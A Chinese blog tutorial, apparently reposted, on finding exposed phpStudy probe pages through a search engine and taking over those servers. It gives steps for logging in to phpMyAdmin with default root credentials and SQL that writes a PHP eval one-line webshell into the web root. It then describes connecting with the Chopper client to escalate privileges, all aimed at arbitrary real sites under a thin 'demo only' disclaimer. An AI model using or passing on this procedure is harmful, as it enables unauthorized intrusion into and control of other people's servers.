• 利用phpStudy 探针 提权网站服务器


    声明:

    本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!


    • 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。

    • 搜索引擎KeyWord:

    phpStudy 探针 2014

    • 多往后翻翻。翻个几十页最好。

    • 点开搜索到的内容。

    搜索引擎

    点开搜索到的内容。

    翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root):

    尝试数据库账号密码

    1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin

    2、 然后回车即可。

    3、 出现以下界面;默认账号密码尝试登陆;

    尝试登录

    4、 登陆成功后,第一步找到左边导航栏的MYSQL,然后点击上面的SQL,如图

    5、 (点击mysql后,右侧表单会增加很多内容,不要理会他,直接点表单上方的SQL按钮即可。)

    登录成功,进入后台

    6、 下面往SQL写入一句话木马,然后用菜刀连接即可!

    向数据库插入一句话木马

    1、 图片效果不好,贴出代码,自行对比一下子- - 
    2、 Code:

    mysq1
    sql 语句
    Drop TABLE IF EXISTS 菜刀连接密码;
    Create TABLE 自定义一个表名(cmd text NOT NULL);
    Insert INTO 自定义一个表名 (cmd) VALUES('<?php @eval($_POST[菜刀连接密码])?>');
    Select cmd from 自己编写 into outfile 'D:/WWW/菜刀连接地址.php';['左边绝对地址需要根据网页自行更改']
    Drop TABLE IF EXISTS 用户和密码;
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    7、 添加完成后,使用菜刀连接;

    菜刀连接

    后面tmp.php是在写入SQL一句话木马那自定义设置的。

    成功!

    成功连上!可自行提权服务器等操作!

    版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/u010984277/article/details/50799537
  • 相关阅读:
    3.请问配置JDK时环境变量path和JAVA_HOME的作用是什么?
    2.请尝试安装和配置JDK,并给出安装、配置JDK的步骤。
    1.Java为什么能跨平台运行?请简述原理
    字符集
    Java程序输出打字
    <marquee>,视频和音频的插入,正则表达式
    windows.document对象
    while;do while;switch;break;continue
    循环语句 ,for语句
    PHP判断一个文件是否能够被打开
  • 原文地址:https://www.cnblogs.com/apolloren/p/9193631.html
Copyright © 2020-2023  润新知